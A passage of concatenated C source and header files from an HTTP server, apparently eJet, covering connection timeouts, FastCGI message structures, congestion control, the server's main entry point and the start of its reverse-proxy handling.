arr_delete(msg->res_rcvs_list, i);
frame_free(frm);
i--; num--;
}
}
return 1;
}
int http_cli_con_lifecheck (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
time_t curt = 0;
int num = 0;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
num = arr_num(pcon->msg_list);
time(&curt);
if (pcon->httptunnel) {
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->tunnel_keepalive_time) {
return http_con_close(pcon);
}
goto starttimer;
}
if (num <= 0) { //before got one complete header, after replying response
if (pcon->rcv_state <= HTTP_CON_READY) {
if (pcon->reqnum > 0) {
/* after one or more transactions of request receiving and response sending,
Now waiting some time for new incoming request data from client. */
if (pcon->keepalive) {
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_keepalive_time) {
/* send/recv one or more requests, now no request coming
for keepalive time */
return http_con_close(pcon);
}
} else {
/* send/recv one or more requests, now close connection
while no keepalive */
return http_con_close(pcon);
}
} else if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_conn_idle_time) {
/* built connection, no request comes in */
return http_con_close(pcon);
}
} else if (pcon->rcv_state == HTTP_CON_SSL_HANDSHAKING) {
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_header_time) {
/* SSL handshaking in process, it last too long */
return http_con_close(pcon);
}
} else if (pcon->rcv_state == HTTP_CON_WAITING_HEADER) {
/* has got partial HTTP-request header */
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_header_idletime) {
/* after got partial request header, no byte send out for sometime */
return http_con_close(pcon);
} else if (pcon->stamp > pcon->transbgn &&
pcon->stamp - pcon->transbgn >= mgmt->cli_header_time)
{
/* not got one full request header, from first byte to now,
close it when exceeding max waiting time */
return http_con_close(pcon);
}
}
} else { //num > 0, after got one complete request header, before replying succ
if (curt > pcon->stamp && curt - pcon->stamp >= mgmt->cli_request_handle_time) {
/* after received header, waiting for proxy and upper layer callback handling */
return http_con_close(pcon);
}
}
starttimer:
pcon->life_timer = iotimer_start(mgmt->pcore,
mgmt->conn_check_interval * 1000,
t_http_cli_con_life, (void *)pcon->conid,
http_pump, mgmt);
return 0;
}
<|start_filename|>include/http_pump.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_PUMP_H_
#define _HTTP_PUMP_H_
#ifdef __cplusplus
extern "C" {
#endif
/* HTTP system pump, it's the callback of all device events and timer timeout events */
int http_pump (void * vmgmt, void * vobj, int event, int fdtype);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_fcgi_msg.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FASTCGI_MSG_H_
#define _HTTP_FASTCGI_MSG_H_
#include "http_msg.h"
#include "http_fcgi_srv.h"
#ifdef __cplusplus
extern "C" {
#endif
/* About specification of FastCGI, please refer to
http://www.mit.edu/~yandros/doc/specs/fcgi-spec.html */
#define FCGI_PROTO_VERSION 0x01
#define FCGI_CONTENT_MAX 65535
/* Values for type component of FCGI_Header */
#define FCGI_BEGIN_REQUEST 1
#define FCGI_ABORT_REQUEST 2
#define FCGI_END_REQUEST 3
#define FCGI_PARAMS 4
#define FCGI_STDIN 5
#define FCGI_STDOUT 6
#define FCGI_STDERR 7
#define FCGI_DATA 8
#define FCGI_GET_VALUES 9
#define FCGI_GET_VALUES_RESULT 10
#define FCGI_UNKNOWN_TYPE 11
#define FCGI_MAXTYPE (FCGI_UNKNOWN_TYPE)
/* Values for role component of FCGI_BeginRequestBody */
#define FCGI_RESPONDER 1
#define FCGI_AUTHORIZER 2
#define FCGI_FILTER 3
/* Values for protocolStatus component of FCGI_EndRequestBody */
#define FCGI_REQUEST_COMPLETE 0
#define FCGI_CANT_MPX_CONN 1
#define FCGI_OVERLOADED 2
#define FCGI_UNKNOWN_ROLE 3
/* Variable names for FCGI_GET_VALUES / FCGI_GET_VALUES_RESULT records */
#define FCGI_MAX_CONNS "FCGI_MAX_CONNS"
#define FCGI_MAX_REQS "FCGI_MAX_REQS"
#define FCGI_MPXS_CONNS "FCGI_MPXS_CONNS"
typedef struct fastcgi_header {
uint8 version;
uint8 type;
uint16 reqid;
uint16 contlen;
uint8 padding;
uint8 reserved;
/* parsing state of receiving FastCGI stream */
uint8 wait_more_data;
uint16 data_to_read;
uint16 body_to_read;
uint8 padding_to_read;
} FcgiHeader, fcgi_header_t;
typedef struct fastcgi_msg_s {
uint16 msgid;
HTTPMsg * httpmsg;
int req_body_flag; //BC_CONTENT_LENGTH or BC_TE
int64 req_body_length;
int64 req_body_iolen;
int64 req_stream_sent; //total sent length including header and body
uint8 reqsent; //0-not sent or in sending 1-already sent
/* by adopting zero-copy for higher performance, frame buffers of HTTPCon, which stores
octets from sockets, will be moved to following list, for further parsing or handling.
the overhead of memory copy will be lessened significantly. */
arr_t * req_rcvs_list;
/* the fragmented data blocks to be sent to CGI-Server are stored in chunk_t */
chunk_t * req_body_chunk;
unsigned fcgi_role : 16;
unsigned fcgi_keep_alive : 1;
/* encoded octent stream for fastcgi request :
begin_request_header(01 01 00 01 00 08 00 00) (8 bytes)
begin_request_body (00 01 00 00 00 00 00 00) (8 bytes)
fcgi_params_header (01 04 00 01 XX XX YY 00) (8 bytes)
.................. (XXXX paralen bytes)
padding 0 (YY bytes for 8-byte alignment)
fcgi_params_header (01 04 00 01 00 00 00 00) (8 bytes, 0-length params content)
*/
frame_p fcgi_request;
int req_header_length;
/* if HTTP request body exists and body length is big enough, it may take 1 or more
FCGI_STDIN requests that each body length is not greater than 65535.
we prepare at most 32 FCGI_STDIN for the segments of streamed HTTP request body.
fcgi_stdin_header (01 05 00 01 XX XX YY 00) (8 bytes, if exists request body )
.................. (content-length XXXX bytes's request body)
padding 0 (YY bytes for 8-byte alignment)
fcgi_stdin_header (01 05 00 01 00 00 00 00) (8 bytes, 0-length stdin content)
*/
int fcgi_stdin_num;
uint8 fcgi_stdin_header[32][8];
uint8 * fcgi_stdin_body[32];
int fcgi_stdin_body_len[32];
uint8 * fcgi_stdin_padding[32];
int fcgi_stdin_padding_len[32];
/* encoded octent stream for fastcgi abort :
abort request(01 02 00 01 00 00 00 00) (8 bytes)
*/
uint8 fcgi_abort[8];
/* received octet stream from cgi-server:
fcgi_stdout_header (01 06 00 01 XX XX YY 00) (8 bytes)
................. (content-length XXXX bytes' response header and body)
padding 0 (YY bytes fro 8-byte alignment)
end request header (01 03 00 01 00 08 00 00) (8 bytes)
end request body (00 00 00 00 00 08 00 00) (8 bytes)
*/
uint32 app_status;
uint8 proto_status;
uint8 got_all_header;
uint8 got_end_request;
FcgiHeader cgihdr;
ulong conid;
void * pcon;
time_t createtime;
time_t stamp;
FcgiSrv * srv;
} FcgiMsg, fcgi_msg_t;
int fcgi_header_type_valid (uint8 type, int resp);
int fcgi_header_decode (void * p, int len, FcgiHeader * hdr);
int http_fcgimsg_cmp_fcgimsg (void * a, void *b);
int http_fcgimsg_cmp_msgid (void * a, void *b);
ulong http_fcgimsg_hash_msgid (void * key);
int http_fcgimsg_init (void * vmsg);
int http_fcgimsg_free (void * vmsg);
void * http_fcgimsg_fetch (void * vsrv);
int http_fcgimsg_recycle (void * vmsg);
void * http_fcgimsg_open (void * vsrv, void * vhttpmsg);
int http_fcgimsg_close (void * vmsg);
int http_fcgimsg_abort (void * vmsg);
int http_fcgimsg_request_encode (void * vmsg);
int http_fcgimsg_abort_encode (void * vmsg);
int http_fcgimsg_stdin_init (void * vmsg);
int http_fcgimsg_stdin_encode (void * vmsg, void * pbyte, int bytelen, int end);
int http_fcgimsg_stdin_end_encode (void * vmsg);
int http_fcgimsg_stdin_body_sentnum (void * vmsg, int sentlen);
int http_fcgimsg_pre_crash (void * vmsg, int status);
int http_fcgimsg_stdin_encode_chunk (void * vmsg, void * pbyte, int bytelen, void * porig, int end);
int http_fcgimsg_stdin_end_encode_chunk (void * vmsg);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>include/http_fcgi_con.h<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#ifndef _HTTP_FCGI_CON_H_
#define _HTTP_FCGI_CON_H_
#include "http_fcgi_msg.h"
#ifdef __cplusplus
extern "C" {
#endif
/* timer command id that identify the timeout event type */
#define t_fcgi_srv_con_build 2310
#define t_fcgi_srv_con_life 2312
/* HTTP connection automation state definition for FCGI Receiving (Request or Response) */
#define FCGI_CON_NULL 0
#define FCGI_CON_READY 1
#define FCGI_CON_RECVING 3
#define FCGI_CON_WAITING_HEADER 4
#define FCGI_CON_WAITING_BODY 5
/* HTTP connection automation state definition for FCGI Sending (Request or Response) */
#define FCGI_CON_IDLE 0
#define FCGI_CON_CONNECTING 10
#define FCGI_CON_SEND_READY 11
#define FCGI_CON_FEEDING 12
typedef struct http_fcgi_con {
void * res[2];
ulong conid;
int rcv_state;
int snd_state;
uint8 socktype; //0-TCP 1-Unix Socket
char unixsock[256];
char dstip[41];
int dstport;
/* following members used for accept-client probe-device management */
CRITICAL_SECTION rcvCS;
void * pdev;
int read_ignored;
frame_p rcvstream;
void * ready_timer;
time_t stamp;
time_t createtime;
void * life_timer;
unsigned retrytimes : 4;
unsigned reqnum : 12;
unsigned resnum : 10;
unsigned keepalive : 1;
/* current handling FcgiMsg request instance */
FcgiMsg * msg;
/* multiple requests occur over single tcp connection, response
* should be pipelined to reply to client */
arr_t * msg_list;
CRITICAL_SECTION msglistCS;
/* system management instance */
void * pcore;
void * srv;
} FcgiCon, fcgi_con_t;
int http_fcgicon_cmp_fcgicon (void * a, void * b);
int http_fcgicon_cmp_conid (void * a, void * pat);
ulong http_fcgicon_hash_func (void * key);
/* http connection instance release/initialize/recycle routines */
int http_fcgicon_init (void * vcon);
int http_fcgicon_free (void * vcon);
int http_fcgicon_recycle (void * vcon);
void * http_fcgicon_fetch (void * vmgmt);
void * http_fcgicon_open (void * vsrv);
int http_fcgicon_close (void * vcon);
int http_fcgicon_connect (void * vpcon);
int http_fcgicon_connected (void * vpcon);
int http_fcgicon_reqnum (void * vcon);
ulong http_fcgicon_id (void * vcon);
void * http_fcgicon_device (void * vcon);
int http_fcgicon_msg_add (void * vcon, void * vmsg);
int http_fcgicon_msg_del (void * vcon, void * vmsg);
void * http_fcgicon_msg_first (void * vcon);
void * http_fcgicon_msg_last (void * vcon);
#ifdef __cplusplus
}
#endif
#endif
<|start_filename|>src/http_cc.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
Congestion Control of underlying TCP is activated by removing
the event-notification and filling the receiving buffer of TCP connection
*/
#include "adifall.ext"
#include "epump.h"
#include "http_con.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_srv.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_fcgi_srv.h"
#include "http_fcgi_msg.h"
#include "http_fcgi_con.h"
#include "http_fcgi_io.h"
extern HTTPMgmt * gp_httpmgmt;
int http_cli_recv_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * srvmsg = NULL;
HTTPCon * srvcon = NULL;
FcgiSrv * cgisrv = NULL;
FcgiMsg * cgimsg = NULL;
FcgiCon * cgicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* === TUNNEL === */
if (pcon->httptunnel == 1 && pcon->tunnelcon &&
frameL(pcon->rcvstream) >= mgmt->proxy_buffer_size)
{
/* As the tunnel connection of client request, if client-side
receiving speed is greater than server-side sending speed,
large data will be piled up in rcvstream. Limiting receiving
speed is needed by neglecting the READ event to activate
TCP Congestion Control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
if (!tcp_connected(iodev_fd(pcon->pdev))) {
http_con_close(pcon->tunnelcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
return 1;
}
/* === PROXY === */
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 1 && (srvmsg = msg->proxymsg) &&
chunk_rest_size(srvmsg->req_body_chunk, 0) >= mgmt->proxy_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP stack recv-buffer will be full soon.
TCP stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
srvcon = srvmsg->pcon;
if (!tcp_connected(iodev_fd(pcon->pdev)) ||
(srvcon && !tcp_connected(iodev_fd(srvcon->pdev)))
) {
http_con_close(srvmsg->pcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
return 2;
}
/* === FastCGI === */
if (msg && msg->fastcgi == 1 && (cgimsg = msg->fcgimsg) &&
chunk_rest_size(cgimsg->req_body_chunk, 0) >= mgmt->fcgi_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP stack recv-buffer will be full soon.
TCP stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
cgisrv = (FcgiSrv *)cgimsg->srv;
cgicon = http_fcgisrv_con_get(cgisrv, cgimsg->conid);
if (!tcp_connected(iodev_fd(pcon->pdev)) /*||
(cgicon && !tcp_connected(iodev_fd(cgicon->pdev))) */
) {
http_fcgicon_close(cgicon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
return 3;
}
return 0;
}
int http_cli_send_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * srvmsg = NULL;
HTTPCon * srvcon = NULL;
FcgiSrv * cgisrv = NULL;
FcgiMsg * cgimsg = NULL;
FcgiCon * cgicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* as the congestion of connection to client, data from peer side are piled up.
after sending to client successfully, peer connection should be monitored for
event notification.
*/
/* === TUNNEL === */
if (pcon->httptunnel == 1 && (srvcon = pcon->tunnelcon) &&
srvcon->read_ignored > 0 && frameL(srvcon->rcvstream) < mgmt->proxy_buffer_size)
{
iodev_add_notify(srvcon->pdev, RWF_READ);
srvcon->read_ignored = 0;
http_srv_recv(srvcon);
return 1;
}
/* === PROXY === */
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 1 && (srvmsg = msg->proxymsg)) {
srvcon = srvmsg->pcon;
if (srvcon && srvcon->read_ignored > 0 &&
chunk_rest_size(msg->res_body_chunk, 0) < mgmt->proxy_buffer_size)
{
iodev_add_notify(srvcon->pdev, RWF_READ);
srvcon->read_ignored = 0;
http_srv_recv(srvcon);
return 2;
}
}
/* === FastCGI === */
if (msg && msg->fastcgi == 1 && (cgimsg = msg->fcgimsg)) {
cgisrv = (FcgiSrv *)cgimsg->srv;
cgicon = http_fcgisrv_con_get(cgisrv, cgimsg->conid);
/* read the blocked data in server-side kernel socket for
client-side congestion control */
if (cgicon && cgicon->read_ignored > 0 &&
chunk_rest_size(msg->res_body_chunk, 0) < mgmt->fcgi_buffer_size)
{
iodev_add_notify(cgicon->pdev, RWF_READ);
cgicon->read_ignored = 0;
http_fcgi_recv(cgicon);
return 3;
}
}
return 0;
}
int http_srv_recv_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * climsg = NULL;
HTTPCon * clicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
if ((clicon = pcon->tunnelcon) && frameL(pcon->rcvstream) >= mgmt->proxy_buffer_size) {
/* As the tunnel connection of client request, if server-side
receiving speed is greater than client-side sending speed,
large data will be piled up in rcvstream. Limiting receiving
speed is needed by neglecting the READ event to activate
TCP Congestion Control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
if (!tcp_connected(iodev_fd(pcon->pdev))) {
http_con_close(pcon->tunnelcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
if (pcon->srv)
time(&((HTTPSrv *)(pcon->srv))->stamp);
return 1;
}
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 2 && (climsg = msg->proxymsg) && !climsg->cacheon &&
chunk_rest_size(climsg->res_body_chunk, 0) >= mgmt->proxy_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP stack recv-buffer will be full soon.
TCP stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
clicon = climsg->pcon;
if (!tcp_connected(iodev_fd(pcon->pdev)) ||
(clicon && !tcp_connected(iodev_fd(clicon->pdev)))
) {
http_con_close(climsg->pcon);
http_con_close(pcon);
return -100;
}
time(&pcon->stamp);
if (pcon->srv)
time(&((HTTPSrv *)(pcon->srv))->stamp);
return 2;
}
return 0;
}
int http_srv_send_cc (void * vcon)
{
HTTPCon * pcon = (HTTPCon *)vcon;
HTTPMgmt * mgmt = NULL;
HTTPMsg * msg = NULL;
HTTPMsg * climsg = NULL;
HTTPCon * clicon = NULL;
if (!pcon) return -1;
mgmt = (HTTPMgmt *)pcon->mgmt;
if (!mgmt) return -2;
/* as the congestion of connection to server, data from peer side are piled up.
after sending to server successfully, peer connection should be monitored for
event notification.
*/
/* === TUNNEL === */
if (pcon->httptunnel == 2 && (clicon = pcon->tunnelcon) &&
clicon->read_ignored > 0 && frameL(clicon->rcvstream) < mgmt->proxy_buffer_size)
{
iodev_add_notify(clicon->pdev, RWF_READ);
clicon->read_ignored = 0;
http_cli_recv(clicon);
return 1;
}
/* === PROXY === */
msg = http_con_msg_first(pcon);
if (msg && msg->proxied == 2 && (climsg = msg->proxymsg)) {
clicon = climsg->pcon;
if (clicon && clicon->read_ignored > 0 &&
chunk_rest_size(msg->req_body_chunk, 0) < mgmt->proxy_buffer_size)
{
iodev_add_notify(clicon->pdev, RWF_READ);
clicon->read_ignored = 0;
http_cli_recv(clicon);
return 2;
}
}
return 0;
}
int http_fcgi_recv_cc (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
HTTPMsg * httpmsg = NULL;
HTTPCon * httpcon = NULL;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
msg = http_fcgicon_msg_first(pcon);
if (msg) httpmsg = msg->httpmsg;
if (httpmsg) mgmt = httpmsg->httpmgmt;
if (!mgmt) mgmt = gp_httpmgmt;
if (msg && httpmsg && mgmt &&
chunk_rest_size(httpmsg->res_body_chunk, 0) >= mgmt->fcgi_buffer_size)
{
/* congestion control: by neglecting the read-ready event,
underlying TCP/UnixSocket stack recv-buffer will be full soon.
TCP/UnixSocket stack will start congestion control mechanism */
iodev_del_notify(pcon->pdev, RWF_READ);
pcon->read_ignored++;
httpcon = httpmsg->pcon;
if (/*!tcp_connected(iodev_fd(pcon->pdev)) ||*/
(httpcon && !tcp_connected(iodev_fd(httpcon->pdev)))
) {
http_con_close(httpmsg->pcon);
http_fcgicon_close(pcon);
return -100;
}
time(&pcon->stamp);
if (pcon->srv)
time(&((FcgiSrv *)(pcon->srv))->stamp);
return 1;
}
return 0;
}
int http_fcgi_send_cc (void * vcon)
{
FcgiCon * pcon = (FcgiCon *)vcon;
FcgiMsg * msg = NULL;
HTTPMsg * httpmsg = NULL;
HTTPCon * httpcon = NULL;
HTTPMgmt * mgmt = NULL;
if (!pcon) return -1;
msg = http_fcgicon_msg_first(pcon);
if (msg && (httpmsg = msg->httpmsg) && httpmsg->fastcgi == 1) {
httpcon = httpmsg->pcon;
mgmt = (HTTPMgmt *)httpmsg->httpmgmt;
if (!mgmt) mgmt = gp_httpmgmt;
/* read the blocked data in server-side kernel socket for
client-side congestion control */
if (httpcon && httpcon->read_ignored > 0 &&
chunk_rest_size(msg->req_body_chunk, 0) < mgmt->fcgi_buffer_size)
{
iodev_add_notify(httpcon->pdev, RWF_READ);
httpcon->read_ignored = 0;
http_cli_recv(httpcon);
return 1;
}
}
return 0;
}
<|start_filename|>ejetsrv/ejetsrv.c<|end_filename|>
#include "adifall.ext"
#include <signal.h>
#include "epump.h"
#include "ejet.h"
void * g_quitsys_event = NULL;
void * g_pcore = NULL;
#ifdef _WIN32
CHAR * g_ServiceName = "ejetsrv";
#endif
int EntryPoint (int argc, char ** argv);
int system_shutdown ()
{
epcore_stop_epump(g_pcore);
epcore_stop_worker(g_pcore);
SLEEP(1000);
event_set(g_quitsys_event, -10);
return 0;
}
static void signal_handler(int sig)
{
switch(sig) {
case SIGHUP:
tolog(1, "hangup signal catched\n" );
break;
case SIGTERM:
case SIGKILL:
case SIGINT:
tolog(1, "terminate signal catched, now exiting...\n");
system_shutdown();
break;
}
}
char * sys_version ()
{
static char sysver[] = "Ver: 1.2.4 Built: "__TIME__", " __DATE__;
return sysver;
}
int main (int argc, char ** argv)
{
if (argc == 2 && strcasecmp(argv[1], "--version") == 0) {
printf("%s\n", sys_version());
return 0;
}
return EntryPoint(argc, argv);
}
int EntryPoint (int argc, char ** argv)
{
void * pcore = NULL;
char opt;
int cpunum = 0;
int epumpnum = 0;
int workernum = 0;
void * httpmgmt = NULL;
char * jsonconf = "ejet.conf";
void * hlog = NULL;
uint8 daemon = 0;
char * plockfile = "ejetsrv.lck",
* pinstalldir = ".";
int lock_fd = -1;
#ifdef UNIX
struct sigaction sa;
char * glocksrv = "/var/lock/subsys/ejetsrv";
void * glock = NULL;
#endif
if (argc < 2) {
fprintf(stderr, "Usage: %s [-j json file] [-L exclusive file] [-d] "
"[-l lockfile.lck] [-i install-dir]\n", argv[0]);
return 0;
}
while ((opt = getopt(argc, argv, "l:i:j:d")) != -1) {
switch (opt) {
case 'j':
jsonconf = optarg;
break;
case 'L':
glocksrv = optarg;
break;
case 'd':
daemon = 1;
break;
case 'i':
pinstalldir = optarg;
break;
case 'l':
glocksrv = optarg;
break;
default:
fprintf(stderr, "Unknown option -%c\n", opt);
break;
}
}
#ifdef _WIN32
const char * strMutexName = "HttpService3280834";
HANDLE hMutex = NULL;
//main_entry(argc, argv);
hMutex = CreateMutex(NULL, TRUE, strMutexName);
if (ERROR_ALREADY_EXISTS == GetLastError() || NULL == hMutex)
return 0;
#endif
#ifdef UNIX
signal(SIGPIPE, SIG_IGN);
sa.sa_handler = SIG_IGN;
sa.sa_flags = 0;
if (sigemptyset(&sa.sa_mask) == -1 || sigaction(SIGPIPE, &sa, 0) == -1) {
perror("failed to ignore SIGPIPE in sigaction");
exit(0);
}
if (!file_exist(glocksrv)) {
file_dir_create(glocksrv, 1);
}
if (file_mutex_locked(glocksrv) != 0) {
exit(0);
}
if (daemon) {
lock_fd = daemonize (plockfile, pinstalldir);
}
signal(SIGCHLD, SIG_IGN); /* ignore child */
signal(SIGTSTP, SIG_IGN); /* ignore tty signals */
signal(SIGTTOU, SIG_IGN);
signal(SIGPIPE, SIG_IGN);
signal(SIGTTIN, SIG_IGN);
signal(SIGHUP, signal_handler); /* catch hangup signal */
signal(SIGTERM, signal_handler); /* catch kill signal */
signal(SIGINT, signal_handler); /* catch SIGINT signal */
glock = file_mutex_init(glocksrv);
file_mutex_lock(glock);
#endif
hlog = trlog_init("ejet.log", 0);
pcore = epcore_new(65535, 1);
g_pcore = pcore;
httpmgmt = http_mgmt_alloc(pcore, jsonconf, 0, 0);
http_mgmt_init(httpmgmt);
//http_mgmt_set_reqhandler(mgmtmgmt, handle_request);
/* now startup the system, epump as the engine will be erected */
cpunum = get_cpu_num();
epumpnum = cpunum * 0.2;
if (epumpnum < 3) epumpnum = 3;
workernum = cpunum - epumpnum;
if (workernum < 3) workernum = 3;
/* start worker threads */
epcore_start_worker(pcore, workernum);
/* start epump threads */
epcore_start_epump(pcore, epumpnum - 1);
#ifdef _DEBUG
/* create new epump thread executing the epump_main_proc */
epump_main_start(pcore, 1);
g_quitsys_event = event_create();
while(event_wait(g_quitsys_event, 1000) != -10) {
continue;
}
event_destroy(g_quitsys_event);
#else
/* main thread executing the epump_main_proc as an epump thread */
epump_main_start(pcore, 0);
#endif
http_mgmt_cleanup(httpmgmt);
epcore_clean(pcore);
#ifdef UNIX
file_mutex_unlock(glock);
file_mutex_destroy(glock);
if (lock_fd >= 0) close(lock_fd);
#endif
#ifdef _WIN32
CloseHandle(hMutex);
#endif
trlog_clean(hlog);
#ifdef _DEBUG
printf("\nMAIN Thread exited successfully...\n");
#endif
return 0;
}
<|start_filename|>src/http_proxy.c<|end_filename|>
/*
* Copyright (c) 2003-2021 <NAME> <<EMAIL>>
* All rights reserved. See MIT LICENSE for redistribution.
*/
#include "adifall.ext"
#include "epump.h"
#include "http_con.h"
#include "http_msg.h"
#include "http_mgmt.h"
#include "http_cli_io.h"
#include "http_srv_io.h"
#include "http_listen.h"
#include "http_request.h"
#include "http_response.h"
#include "http_srv.h"
#include "http_chunk.h"
#include "http_ssl.h"
#include "http_cache.h"
#include "http_cc.h"
#include "http_fcgi_io.h"
#include "http_handle.h"
#include "http_proxy.h"
extern char * g_http_version;
int http_proxy_handle (void * vmsg)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPMsg * proxymsg = NULL;
char url[4096];
if (!msg) return -1;
/* check the request if it's to be proxyed to other origin server */
if (http_proxy_check(msg, url, sizeof(url)-1) <= 0)
return -100;
if (http_proxy_cache_open(msg) >= 3) {
/* cache file exists in local directory */
return -200;
}
/* create one proxy HTTPMsg object, with headers X-Forwarded-For and X-Real-IP */
proxymsg = msg->proxymsg = http_proxy_srvmsg_open(msg, url, strlen(url));
if (proxymsg == NULL) {
return -300;
}
msg->proxied = 1;
if (http_srv_msg_dns(proxymsg, http_proxy_srvmsg_dns_cb) < 0) {
msg->proxied = 0;
msg->proxymsg = NULL;
http_msg_close(proxymsg);
return -400;
}
return 0;
}
int http_proxy_check (void * vmsg, void * purl, int urlen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
HTTPListen * hl = NULL;
char * url = (char *)purl;
int ret = 0;
if (!msg) return 0;
if (msg->proxied == 1) {
/* when rewrite a new absolute URL with forward or proxy, start proxy operation */
if (msg->req_url_type > 0) {
str_secpy(url, urlen, frameP(msg->docuri->uri), frameL(msg->docuri->uri));
if (msg->fwdurl) kfree(msg->fwdurl);
msg->fwdurllen = frameL(msg->docuri->uri);
msg->fwdurl = str_dup(frameP(msg->docuri->uri), frameL(msg->docuri->uri));
return 1;
}
msg->proxied = 0;
}
hl = (HTTPListen *)msg->hl;
if (!hl) return 0;
if (msg->req_url_type > 0 && !msg->ploc && hl->forwardproxy == 1) {
/* Web server is also served as proxy for the requesting client,
the url in request line is absolute address and have no Loc instance. */
str_secpy(url, urlen, frameP(msg->uri->uri), frameL(msg->uri->uri));
if (msg->fwdurl) kfree(msg->fwdurl);
msg->fwdurllen = frameL(msg->uri->uri);
msg->fwdurl = str_dup(frameP(msg->uri->uri), frameL(msg->uri->uri));
return 1;
}
if (!msg->ploc) return 0;
/* location / {
* path = [ '/', '^~' ];
* type = server;
* index = [ index.html, index.htm ];
* root = /opt/httpdoc/;
* }
* location {
* path = [ '/cache/', '^~' ];
* type = proxy
* passurl = http://www.abcxxx.com/;
* }
* /cache/cdn/view?fid=3782837A0FA83B764E36A377B366CE98&stamp=327239843983
* url -->
* http://www.abcxxx.com/cdn/view?fid3782837A0FA83B764E36A377B366CE98&stamp=327239843983
*/
ret = http_loc_passurl_get(msg, SERV_PROXY, url, urlen);
if (ret > 0) {
if (msg->fwdurl) kfree(msg->fwdurl);
msg->fwdurllen = strlen(url);
msg->fwdurl = str_dup(url, msg->fwdurllen);
return 1;
}
return 0;
}
int http_proxy_srv_send_start (void * vproxymsg)
{
HTTPMsg * proxymsg = (HTTPMsg *)vproxymsg;
HTTPMgmt * mgmt = NULL;
HTTPCon * proxycon = NULL;
HTTPSrv * srv = NULL;
if (!proxymsg) return -1;
mgmt = (HTTPMgmt *)proxymsg->httpmgmt;
if (!mgmt) return -2;
srv = http_srv_open(mgmt, proxymsg->dstip, proxymsg->dstport, proxymsg->ssl_link, 100);
if (!srv) return -100;
proxycon = http_srv_connect(srv);
if (proxycon) {
/* upcoming R/W events of proxycon will delivered to current thread.
for the Read/Write pipeline of 2 HTTP connections */
iodev_workerid_set(proxycon->pdev, 1);
http_con_msg_add(proxycon, proxymsg);
http_proxy_srv_send(proxycon, proxymsg);
} else {
http_srv_msg_push(srv, proxymsg);
}
return 0;
}
int http_proxy_srvmsg_dns_cb (void * vproxymsg, char * name, int len, void * cache, int status)
{
HTTPMsg * proxymsg = (HTTPMsg *)vproxymsg;
HTTPMsg * climsg = NULL;
int ret = 0;
if (!proxymsg) return -1;
climsg = proxymsg->proxymsg;
if (status == DNS_ERR_IPV4 || status == DNS_ERR_IPV6) {
str_secpy(proxymsg->dstip, sizeof(proxymsg->dstip)-1, name, len);
} else if (dns_cache_getip(cache, 0, proxymsg->dstip, sizeof(proxymsg->dstip)-1) <= 0) {
tolog(1, "eJet - Proxy: DNS Resolving of Origin Server '%s' failed.\n", name);
ret = -100;
goto failed;
}
if (http_proxy_srv_send_start(proxymsg) < 0) {
ret = -200;
goto failed;
}
return 0;
failed:
if (climsg) {
climsg->SetStatus(climsg, 404, NULL);
climsg->Reply(climsg);
}
http_con_msg_del(proxymsg->pcon, proxymsg);
http_msg_close(proxymsg);
return ret;
}
void * http_proxy_srvmsg_open (void * vmsg, char * url, int urllen)
{
HTTPMsg * msg = (HTTPMsg *)vmsg;
